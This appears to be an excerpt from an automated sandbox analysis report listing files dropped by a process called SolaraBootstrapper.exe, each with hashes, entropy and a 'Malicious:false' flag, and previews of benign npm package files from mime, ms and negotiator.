                                                  SHA-512:74B2D8DBF9AD22E4857A37CA17082482AE2D90846DF3BD21D0C7525FB928899EEE5C89E6CBEDB609279B7A923FAE5E57BB97DDB807083AE72D0FDD4D0ACF1082
                                                  Malicious:false
                                                  Preview:{. "author": {. "name": "Robert Kieffer",. "url": "http://github.com/broofa",. "email": "robert@broofa.com". },. "bin": {. "mime": "cli.js". },. "engines": {. "node": ">=4". },. "contributors": [. {. "name": "Benjamin Thomas",. "url": "http://github.com/bentomas",. "email": "benjamin@benjaminthomas.org". }. ],. "description": "A comprehensive library for mime-type mapping",. "license": "MIT",. "dependencies": {},. "devDependencies": {. "github-release-notes": "0.13.1",. "mime-db": "1.31.0",. "mime-score": "1.1.0". },. "scripts": {. "prepare": "node src/build.js",. "changelog": "gren changelog --tags=all --generate --override",. "test": "node src/test.js". },. "keywords": [. "util",. "mime". ],. "main": "mime.js",. "name": "mime",. "repository": {. "url": "https://github.com/broofa/node-mime",. "type": "git". },. "version": "1.6.0".}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:a /usr/bin/env node script, ASCII text executable
                                                  Category:dropped
                                                  Size (bytes):1351
                                                  Entropy (8bit):4.969465816534509
                                                  Encrypted:false
                                                  SSDEEP:24:yuTGzvvmbkOldw6E54g55DSxOn/zadOZfoie1p37IwBpy+yVu0iE3:Wzv2kOldwT4iz/zdZfor1OEs+j0iE3
                                                  MD5:DAF164E6D251C818B190DB781F845776
                                                  SHA1:F37722B22AD17B428B8B4B97B5C09720B4E86A9D
                                                  SHA-256:FACAA3974BFA27C832A629735077528B59CBC088FCFD2C22BBACBA152C76EF2A
                                                  SHA-512:9B9623DDD74F1117DA49DFDCEFD0AC5321419E8B3BC8608F4C6F00C11C74F857F1AF0337E7B877B7F0BFC033B4B0A6E4714A7D566960AA26C90BD4389ECB8C95
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:#!/usr/bin/env node..'use strict';..const fs = require('fs');.const path = require('path');.const mimeScore = require('mime-score');..let db = require('mime-db');.let chalk = require('chalk');..const STANDARD_FACET_SCORE = 900;..const byExtension = {};..// Clear out any conflict extensions in mime-db.for (let type in db) {. let entry = db[type];. entry.type = type;.. if (!entry.extensions) continue;.. entry.extensions.forEach(ext => {. if (ext in byExtension) {. const e0 = entry;. const e1 = byExtension[ext];. e0.pri = mimeScore(e0.type, e0.source);. e1.pri = mimeScore(e1.type, e1.source);.. let drop = e0.pri < e1.pri ? e0 : e1;. let keep = e0.pri >= e1.pri ? e0 : e1;. drop.extensions = drop.extensions.filter(e => e !== ext);.. console.log(`${ext}: Keeping ${chalk.green(keep.type)} (${keep.pri}), dropping ${chalk.red(drop.type)} (${drop.pri})`);. }. byExtension[ext] = entry;. });.}..function writeTypesFile(types, path) {. fs.writeF
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2334
                                                  Entropy (8bit):4.840924462459669
                                                  Encrypted:false
                                                  SSDEEP:48:+1sMXGGYGGGcG1rNu6Lu0OYx+lzhMBdHU:+mMWR95KCq3FU
                                                  MD5:E79C602593F0F279E1CB2D8D4A3CE3BF
                                                  SHA1:86D3D2BCF162F3C198AD8315C803FA7F4B928F07
                                                  SHA-256:516EFE52B18B29B36B9AC4ED1D679A497E0846B269A9CF101FB405FBCC8B402B
                                                  SHA-512:635CB1DD9B6EEF04AC7956F186097777936B49E13F902B65ABFBDA7918C16CFDDE9550C3A037435D3AD8FDA9423FC9B9ADD2CC4CADC27EF7FF5BED255A22F081
                                                  Malicious:false
                                                  Preview:/**. * Usage: node test.js. */..var mime = require('../mime');.var assert = require('assert');.var path = require('path');..//.// Test mime lookups.//..assert.equal('text/plain', mime.lookup('text.txt')); // normal file.assert.equal('text/plain', mime.lookup('TEXT.TXT')); // uppercase.assert.equal('text/plain', mime.lookup('dir/text.txt')); // dir + file.assert.equal('text/plain', mime.lookup('.text.txt')); // hidden file.assert.equal('text/plain', mime.lookup('.txt')); // nameless.assert.equal('text/plain', mime.lookup('txt')); // extension-only.assert.equal('text/plain', mime.lookup('/txt')); // extension-less ().assert.equal('text/plain', mime.lookup('\\txt')); // Windows, extension-less.assert.equal('application/octet-stream', mime.lookup('text.nope')); // unrecognized.assert.equal('fallback', mime.lookup('text.fallback', 'fallback')); // alternate default..//.// Test extensions.//..assert.equal('txt', mime.extension(mime.types.text));.ass
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):31555
                                                  Entropy (8bit):4.70326884307998
                                                  Encrypted:false
                                                  SSDEEP:384:gCqLMYcyVwqbEqM+/vGmvLDMWTktVpnKEXrxoEYlzKO7ELn9c51Fq3zMISyHV6Dx:4EqZGpKEXrxoEY8O7J51Fq3XH+9
                                                  MD5:4AC089E4F393ED139CB2EE55726C66A5
                                                  SHA1:CACCD2726F4694FA5A276F34A28C29E8FB073EF5
                                                  SHA-256:A5391E434B1D3D1AD0FFD2C7D2227B4DC3CEAC7FC263D2EC1B93C20B9DAA41F9
                                                  SHA-512:3CCDA52104CA63EA2666D668F784B8F74E258896CD45F24D2F83BD0D3D09D938C2FFEC926B1B3FD0A8C455139629E69671129DE0D0072BEDB8D1B6B3B2260E22
                                                  Malicious:false
                                                  Preview:{"application/andrew-inset":["ez"],"application/applixware":["aw"],"application/atom+xml":["atom"],"application/atomcat+xml":["atomcat"],"application/atomsvc+xml":["atomsvc"],"application/bdoc":["bdoc"],"application/ccxml+xml":["ccxml"],"application/cdmi-capability":["cdmia"],"application/cdmi-container":["cdmic"],"application/cdmi-domain":["cdmid"],"application/cdmi-object":["cdmio"],"application/cdmi-queue":["cdmiq"],"application/cu-seeme":["cu"],"application/dash+xml":["mpd"],"application/davmount+xml":["davmount"],"application/docbook+xml":["dbk"],"application/dssc+der":["dssc"],"application/dssc+xml":["xdssc"],"application/ecmascript":["ecma"],"application/emma+xml":["emma"],"application/epub+zip":["epub"],"application/exi":["exi"],"application/font-tdpfr":["pfr"],"application/font-woff":[],"application/font-woff2":[],"application/geo+json":["geojson"],"application/gml+xml":["gml"],"application/gpx+xml":["gpx"],"application/gxf":["gxf"],"application/gzip":["gz"],"application/hyper
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2764
                                                  Entropy (8bit):4.722254619992073
                                                  Encrypted:false
                                                  SSDEEP:48:1I4pOT+6FLQFChYQlCrFWn5q4W55i8vBeH321aEEg1JPzC3yheCLy0C+ywC8jyGc:iNy6FLQU2SChWn5q4W55F0XeaEru3ylW
                                                  MD5:AE157C9A8E70902576C2D8A06DBCDE32
                                                  SHA1:0D10EE921436FA5FF5988445CC67676219DFFFBE
                                                  SHA-256:4BD92209CB9DACF3E3773E725ACB7AAEC43EA9E78540324E4D0F73E5CE9ADEF7
                                                  SHA-512:4C2F31F1F2A297AB6C55A21D58A5C26CAD22C1ED1913E7A48605111D217257AE2D9F26EA889E8610E011BA9B9C487C91ECDB4CEA3437534FAF905E8FB89BA248
                                                  Malicious:false
                                                  Preview:/**. * Helpers.. */..var s = 1000;.var m = s * 60;.var h = m * 60;.var d = h * 24;.var y = d * 365.25;../**. * Parse or format the given `val`.. *. * Options:. *. * - `long` verbose formatting [false]. *. * @param {String|Number} val. * @param {Object} [options]. * @throws {Error} throw an error if val is not a non-empty string or a number. * @return {String|Number}. * @api public. */..module.exports = function(val, options) {. options = options || {};. var type = typeof val;. if (type === 'string' && val.length > 0) {. return parse(val);. } else if (type === 'number' && isNaN(val) === false) {. return options.long ? fmtLong(val) : fmtShort(val);. }. throw new Error(. 'val is not a non-empty string or a valid number. val=' +. JSON.stringify(val). );.};../**. * Parse the given `str` and return milliseconds.. *. * @param {String} str. * @return {Number}. * @api private. */..function parse(str) {. str = String(str);. if (str.length > 100) {. return;. }. var ma
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1077
                                                  Entropy (8bit):5.1041829250749355
                                                  Encrypted:false
                                                  SSDEEP:24:buyDrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bBDaJHlxE3dQHOs5exm3ogFh
                                                  MD5:FD56FD5F1860961DFA92D313167C37A6
                                                  SHA1:884E84EBFDDAFD93B5BB814DF076D2EBD1757BA8
                                                  SHA-256:6652830C2607C722B66F1B57DE15877AB8FC5DCA406CC5B335AFEB365D0F32C1
                                                  SHA-512:2BEC1EFB4DC59FA436C38A1B45B3DBD54A368460BCBBB3D9791B65275B5DC3C71A4C54BE458F4C74761DCCB8897EFAAB46DF5A407723DA5C48F3DB02D555D5B9
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2016 Zeit, Inc...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR I
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):704
                                                  Entropy (8bit):4.420367267663251
                                                  Encrypted:false
                                                  SSDEEP:12:7t134gRJxQwK/GCjxVMzaFT1oNkQc5s5RBR74J3YqeCVCSWN:513pRXQwUJFT1ou1s1R76YfCISWN
                                                  MD5:CBD55880A650B56C3D5ACDDBBDBEE9BC
                                                  SHA1:4D354DA7ECE1C7D5689B8104F3B6F3DCBAC7790E
                                                  SHA-256:30FBFAA3840B2F63978AD4BCD7ED8DC24D277B818E4755FE93EDA8CB1BC8B74C
                                                  SHA-512:E329A6F6A38DD33BD60334A8DEC4A91AA6E7DAB28F0893240374AE6A303C12646399D821403E3B80EB51317D1808E6ABF30BD91B0BD99951F96815A22BA105C7
                                                  Malicious:false
                                                  Preview:{. "name": "ms",. "version": "2.0.0",. "description": "Tiny milisecond conversion utility",. "repository": "zeit/ms",. "main": "./index",. "files": [. "index.js". ],. "scripts": {. "precommit": "lint-staged",. "lint": "eslint lib/* bin/*",. "test": "mocha tests.js". },. "eslintConfig": {. "extends": "eslint:recommended",. "env": {. "node": true,. "es6": true. }. },. "lint-staged": {. "*.js": [. "npm run lint",. "prettier --single-quote --write",. "git add". ]. },. "license": "MIT",. "devDependencies": {. "eslint": "3.19.0",. "expect.js": "0.3.1",. "husky": "0.13.3",. "lint-staged": "3.4.1",. "mocha": "3.4.1". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1721
                                                  Entropy (8bit):4.954772186039823
                                                  Encrypted:false
                                                  SSDEEP:24:I/nyO7YNfNSBe9CsGdPXkj0cC3aE1y9bM/kLZ2eyJVHBbGPIQV:wygufEBegDo0hcLIdpbGf
                                                  MD5:90E631C6AFCCDE3ED414D3D230734864
                                                  SHA1:E875D9FA741FE44893C778974860F362724E35EC
                                                  SHA-256:C9AC67FF103C01871B0FF09E2F094631991908C1FD0DC08BDB53287E5A760AE5
                                                  SHA-512:BC98602BB2B67AE4FEFAC895CEF22F3C25B2E765D9074121700DC523365FEB252BA813684275F74B7FFCA4A8CBF34B68384AAE1A84BB76D09E55413741172005
                                                  Malicious:false
                                                  Preview:# ms..[![Build Status](https://travis-ci.org/zeit/ms.svg?branch=master)](https://travis-ci.org/zeit/ms).[![Slack Channel](http://zeit-slackin.now.sh/badge.svg)](https://zeit.chat/)..Use this package to easily convert various time formats to milliseconds...## Examples..```js.ms('2 days') // 172800000.ms('1d') // 86400000.ms('10h') // 36000000.ms('2.5 hrs') // 9000000.ms('2h') // 7200000.ms('1m') // 60000.ms('5s') // 5000.ms('1y') // 31557600000.ms('100') // 100.```..### Convert from milliseconds..```js.ms(60000) // "1m".ms(2 * 60000) // "2m".ms(ms('10 hours')) // "10h".```..### Time format written-out..```js.ms(60000, { long: true }) // "1 minute".ms(2 * 60000, { long: true }) // "2 minutes".ms(ms('10 hours'), { long: true }) // "10 hours".```..## Features..- Works both in [node](https://nodejs.org) and in the browser..- If a number is supplied to `ms`, a string with a unit is returned..- If a string that co
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2499
                                                  Entropy (8bit):4.724481905020091
                                                  Encrypted:false
                                                  SSDEEP:48:QgDLBhJIxPY/DeJ2/xA6rgYwN1RvZrQNLkrtC:RDJIxQbeJ7LN1JZrpZC
                                                  MD5:DDC51C280EC46D9811670F9D184AF3E5
                                                  SHA1:2FE55382F30DEC2AE79C116A280CB5DFA51B9772
                                                  SHA-256:6B25039B6A40F7FCB7EB6DC891418D154C4B4154284F58C6BFFCB10AD7587A6D
                                                  SHA-512:8C34483B20AFD92FC17C51A6DF6227E5DCA5B4D8EEED0989DD34371951CB87D323F7BCBF59B9CBC602AE521A8495C18553652189600E9735396A9AD62893D3D1
                                                  Malicious:false
                                                  Preview:0.6.3 / 2022-01-22.==================.. * Revert "Lazy-load modules from main entry point"..0.6.2 / 2019-04-29.==================.. * Fix sorting charset, encoding, and language with extra parameters..0.6.1 / 2016-05-02.==================.. * perf: improve `Accept` parsing speed. * perf: improve `Accept-Charset` parsing speed. * perf: improve `Accept-Encoding` parsing speed. * perf: improve `Accept-Language` parsing speed..0.6.0 / 2015-09-29.==================.. * Fix including type extensions in parameters in `Accept` parsing. * Fix parsing `Accept` parameters with quoted equals. * Fix parsing `Accept` parameters with quoted semicolons. * Lazy-load modules from main entry point. * perf: delay type concatenation until needed. * perf: enable strict mode. * perf: hoist regular expressions. * perf: remove closures getting spec properties. * perf: remove a closure from media type parsing. * perf: remove property delete from media type parsing..0.5.3 / 2015-05-10.===========
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1177
                                                  Entropy (8bit):5.190424654953496
                                                  Encrypted:false
                                                  SSDEEP:24:5HsZxQiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:+xQiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:6417A862A5E35C17C904D9DDA2CBD499
                                                  SHA1:73FEC64FD8A5CEDDBF65F705987A547C3678D981
                                                  SHA-256:553D4D20029A24E315B428A1A54A9E109EAA340F2E958A4F50A92362C2C4070B
                                                  SHA-512:715C695587A028733A092DB12C8CF2986AC745D2D2F958961DAA8F9B9457744BE63C9521C0D34B594BB4E0884A00C5E41E19BEB9666E426511863C2D8241C334
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012-2014 Federico Romero.Copyright (c) 2012-2014 Isaac Z. Schlueter.Copyright (c) 2014-2015 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGE
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4901
                                                  Entropy (8bit):5.022969815301353
                                                  Encrypted:false
                                                  SSDEEP:96:1XCnQzGp9F0CMKE8111mCMTpLvdjhSdd/0K034UKx1oJoDZouADT1KOii:1y9pF111mtF9230IHSJAuX5rN
                                                  MD5:25135D2847230D4854AC342D46AB9E62
                                                  SHA1:64E77F542A43606888D9557240DCA30597DAE242
                                                  SHA-256:B0350B39C18CF8F0D28F078913C91CCCFCBE3ECE1EC6C3CB8EB4C9FD64ADB160
                                                  SHA-512:84DCA1F145B7C35A5C5E2607C97FBAB7B5F64C5C48095E57467FDBA7A503B2FEC30891521A3E85AE5B7EFFDCAFB5A992B856A93417B2F8F464C77EB585FA1759
                                                  Malicious:false
                                                  Preview:# negotiator..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..An HTTP content negotiator for Node.js..## Installation..```sh.$ npm install negotiator.```..## API..```js.var Negotiator = require('negotiator').```..### Accept Negotiation..```js.availableMediaTypes = ['text/html', 'text/plain', 'application/json']..// The negotiator constructor receives a request object.negotiator = new Negotiator(request)..// Let's say Accept header is 'text/html, application/*;q=0.2, image/jpeg;q=0.8'..negotiator.mediaTypes().// -> ['text/html', 'image/jpeg', 'application/*']..negotiator.mediaTypes(availableMediaTypes).// -> ['text/html', 'application/json']..negotiator.mediaType(availableMediaTypes).// -> 'text/html'.```..You can check a working example at `examples/accept.js`...#### Metho
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2451
                                                  Entropy (8bit):4.818099111813789
                                                  Encrypted:false
                                                  SSDEEP:48:Uqxr13RsVlW7GA0GCGbhkX7diNde53AOaaHeF3fPgGdjR22Y8UflX48w:psTWmKkEVtIpa
                                                  MD5:279D02856C1815CE3B6745EE234A91AE
                                                  SHA1:D2DCE41C415F88B5BB49939290D542BEF8EC598D
                                                  SHA-256:4F9279BCFFC74199C671739F2D0E91FE5176A7F7E4683CA59809A50463A842BD
                                                  SHA-512:3751B886D3F78D0BE1E5010B6086B0DF1175F85D52A75A11E9F09232BC35EDDB8E92DEE4F219B705F98A23C05EAEBB79C414D4F57C9FC7EF1E3E831E41E1BCAF
                                                  Malicious:false
                                                  Preview:/*!. * negotiator. * Copyright(c) 2012 Federico Romero. * Copyright(c) 2012-2014 Isaac Z. Schlueter. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';..var preferredCharsets = require('./lib/charset').var preferredEncodings = require('./lib/encoding').var preferredLanguages = require('./lib/language').var preferredMediaTypes = require('./lib/mediaType')../**. * Module exports.. * @public. */..module.exports = Negotiator;.module.exports.Negotiator = Negotiator;../**. * Create a Negotiator instance from a request.. * @param {object} request. * @public. */..function Negotiator(request) {. if (!(this instanceof Negotiator)) {. return new Negotiator(request);. }.. this.request = request;.}..Negotiator.prototype.charset = function charset(available) {. var set = this.charsets(available);. return set && set[0];.};..Negotiator.prototype.charsets = function charsets(available) {. return preferredCharsets(this.request.headers['accept-charset'], available)
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3081
                                                  Entropy (8bit):4.842295755350585
                                                  Encrypted:false
                                                  SSDEEP:96:JMZbj90LFCq7EfTb+X2d2/2O9T1d0/xKUNYbd3REslT:JMZmLcqAf+X2d2/9TzoxKCYTJ
                                                  MD5:7977A65B1542FA8CE9650E58607F4B07
                                                  SHA1:BF9F25A7BF6DC2176B70BC9DA04FC162BDFBF4C4
                                                  SHA-256:E6522A2DF58F21A6CDF8D146F7E85B9A49BCAF68B813DEC15068A8E84FC582C3
                                                  SHA-512:6C5B88F2F56099018F13E40F0C675352271E63E928B03CD25630BDA95059E5C289C78752947DC29E309E66264173D6CED7CC63FCBF0518E955BA12A2BABF5396
                                                  Malicious:false
                                                  Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredCharsets;.module.exports.preferredCharsets = preferredCharsets;../**. * Module variables.. * @private. */..var simpleCharsetRegExp = /^\s*([^\s;]+)\s*(?:;(.*))?$/;../**. * Parse the Accept-Charset header.. * @private. */..function parseAcceptCharset(accept) {. var accepts = accept.split(',');.. for (var i = 0, j = 0; i < accepts.length; i++) {. var charset = parseCharset(accepts[i].trim(), i);.. if (charset) {. accepts[j++] = charset;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a charset from the Accept-Charset header.. * @private. */..function parseCharset(str, i) {. var match = simpleCharsetRegExp.exec(str);. if (!match) return null;.. var charset = match[1];. var q = 1;. if (matc
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3506
                                                  Entropy (8bit):4.858041738762427
                                                  Encrypted:false
                                                  SSDEEP:96:Jz9lluqA5w1W3OFdaxv7VTbYxs2M2vKDgB1dd/xK3viNQAbd3RBslT:Jz9PuFw1cO2RBYxs2M3DgBzlxKfQ3aJ
                                                  MD5:E03DD226452C58CE083AB4468851F0B1
                                                  SHA1:6066E153BCAC0D060CD2E475DDAD0E239422AA0D
                                                  SHA-256:35421DC78D3C1B608922427BBD6E524518168621FF1A44919FC591CA297E813C
                                                  SHA-512:F1966A345F3380075325952275A6AC0668FEA52AE4CAAD431D8AB9068AFE1A3C17B62D2BE0DD9E19B48D843ECF3A58F94DBD52240A69234A2B232044468CD86F
                                                  Malicious:false
                                                  Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredEncodings;.module.exports.preferredEncodings = preferredEncodings;../**. * Module variables.. * @private. */..var simpleEncodingRegExp = /^\s*([^\s;]+)\s*(?:;(.*))?$/;../**. * Parse the Accept-Encoding header.. * @private. */..function parseAcceptEncoding(accept) {. var accepts = accept.split(',');. var hasIdentity = false;. var minQuality = 1;.. for (var i = 0, j = 0; i < accepts.length; i++) {. var encoding = parseEncoding(accepts[i].trim(), i);.. if (encoding) {. accepts[j++] = encoding;. hasIdentity = hasIdentity || specify('identity', encoding);. minQuality = Math.min(minQuality, encoding.q || 1);. }. }.. if (!hasIdentity) {. /*. * If identity doesn't explicitly appear in the accept-encoding header,.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3409
                                                  Entropy (8bit):4.93193307417238
                                                  Encrypted:false
                                                  SSDEEP:96:JSD+3n3BTQbFSv72TbQOZS2cueSKyeT2vZ3Z1d2/xKaNrMbd3RgQslT:JSDQn9Qb+UQOZS2SSK5Tg3ZzaxKorMkt
                                                  MD5:F10E434AE4EED2D3D46FF47582ED9938
                                                  SHA1:248BAA661B5CD4A4368E1DE987A5A911636C41AB
                                                  SHA-256:4AEBB44DA06094F2D56F0B20B4FBDD542CDA00A4C9295E10BBE55203701C9024
                                                  SHA-512:D7BAC6E2CE28525D67E0B8EFF4E2FE1868D11EC69F98C310C1E6258504BCDEFCECACE967A7721FDEABD93AA18D0D40D1BFE54DCEDF0991ED12119AF8BDE74490
                                                  Malicious:false
                                                  Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredLanguages;.module.exports.preferredLanguages = preferredLanguages;../**. * Module variables.. * @private. */..var simpleLanguageRegExp = /^\s*([^\s\-;]+)(?:-([^\s;]+))?\s*(?:;(.*))?$/;../**. * Parse the Accept-Language header.. * @private. */..function parseAcceptLanguage(accept) {. var accepts = accept.split(',');.. for (var i = 0, j = 0; i < accepts.length; i++) {. var language = parseLanguage(accepts[i].trim(), i);.. if (language) {. accepts[j++] = language;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a language from the Accept-Language header.. * @private. */..function parseLanguage(str, i) {. var match = simpleLanguageRegExp.exec(str);. if (!match) return null;.. var prefix = mat
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5358
                                                  Entropy (8bit):4.867691098214956
                                                  Encrypted:false
                                                  SSDEEP:96:JYFkWOwcE7FtJqyWGYYIb7wTblzuXrDciMaTmgI8CY1dzM/xKSNKbd3RFUslgXLl:JYFkW97RWtYIb+lzuXrDcfwmavzzgxKY
                                                  MD5:0FDAA0ED7CAB2CE5FCBD7B361A85892C
                                                  SHA1:9FE7D1F6570E870BF5A90ADA7BA1A7A53480F5CC
                                                  SHA-256:0DAB239C924FA4D5F823548E25DC9F10315BF490B821827B640318B7AA200577
                                                  SHA-512:44BFBECB293939BC5DF1B98C483FC01F36640DE15225D936B919F733A202CCDDA2F727F5543853DE6E541157BDDE8BF57F9CFC918E0EAD1B990569E1779A7BA7
                                                  Malicious:false
                                                  Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredMediaTypes;.module.exports.preferredMediaTypes = preferredMediaTypes;../**. * Module variables.. * @private. */..var simpleMediaTypeRegExp = /^\s*([^\s\/;]+)\/([^;\s]+)\s*(?:;(.*))?$/;../**. * Parse the Accept header.. * @private. */..function parseAccept(accept) {. var accepts = splitMediaTypes(accept);.. for (var i = 0, j = 0; i < accepts.length; i++) {. var mediaType = parseMediaType(accepts[i].trim(), i);.. if (mediaType) {. accepts[j++] = mediaType;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a media type from the Accept header.. * @private. */..function parseMediaType(str, i) {. var match = simpleMediaTypeRegExp.exec(str);. if (!match) return null;.. var params = Object.create(n
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):993
                                                  Entropy (8bit):4.782116934931483
                                                  Encrypted:false
                                                  SSDEEP:12:dc6V1CxR7CB6gi599qPdreLlc6Upu1ZHFPtYuNZWiTjkQfcGa3gPGWdVSYMiP095:dr1CxVW4y9I97YuNZWixTB0xLt
                                                  MD5:5D2BC8AE77831203C6D0CE3A17E599CF
                                                  SHA1:3C1B22E6ECAE04B514912326957E6A205B015098
                                                  SHA-256:8672E91F7395CE51EC789D883D7F7D872A40847BB83A6A3F89C3D1DED39E55D9
                                                  SHA-512:C22AD9D7E1C091B26CA5ABCB7F6E7338EB79BD36E1228DAD9EC6903C9922A2451F518C21507CC82DCCD69BE13132368DE7EFCAD1DE7BA56270C7997DECF3A1AA
                                                  Malicious:false
                                                  Preview:{. "name": "negotiator",. "description": "HTTP content negotiation",. "version": "0.6.3",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Federico Romero <federico.romero@outboxlabs.com>",. "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)". ],. "license": "MIT",. "keywords": [. "http",. "content negotiation",. "accept",. "accept-language",. "accept-encoding",. "accept-charset". ],. "repository": "jshttp/negotiator",. "devDependencies": {. "eslint": "7.32.0",. "eslint-plugin-markdown": "2.2.1",. "mocha": "9.1.3",. "nyc": "15.1.0". },. "files": [. "lib/",. "HISTORY.md",. "LICENSE",. "index.js",. "README.md". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text npm test". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1298
                                                  Entropy (8bit):3.7619199630703575
                                                  Encrypted:false
                                                  SSDEEP:12:k4s2iAdJu/yWJLy0R6m0RvwiorEf+XnH1sffq3ZfZQVN8T+L6lhHpaK6v/ynfQ0A:k4sGJu/Rt6RvwHrXH+nOK8a6K0Qj
                                                  MD5:513690D7F29CCE876C22A14C39D84B4F
                                                  SHA1:B3EF00B90390F9190F17DFDCF53B3D5B49216626
                                                  SHA-256:22417AF06C6566E098C56C7FB458AA716010DEDB878E2BF9C0B9F06BB40E6BC7
                                                  SHA-512:81D27B89931E6EB94415AD4673372444490832076F90288BD9A51751595105040FAE9369BDA4C0E4DF8EC781DFDA223FB971A66497C9F1DFE9319A1B1E33C2D5
                                                  Malicious:false
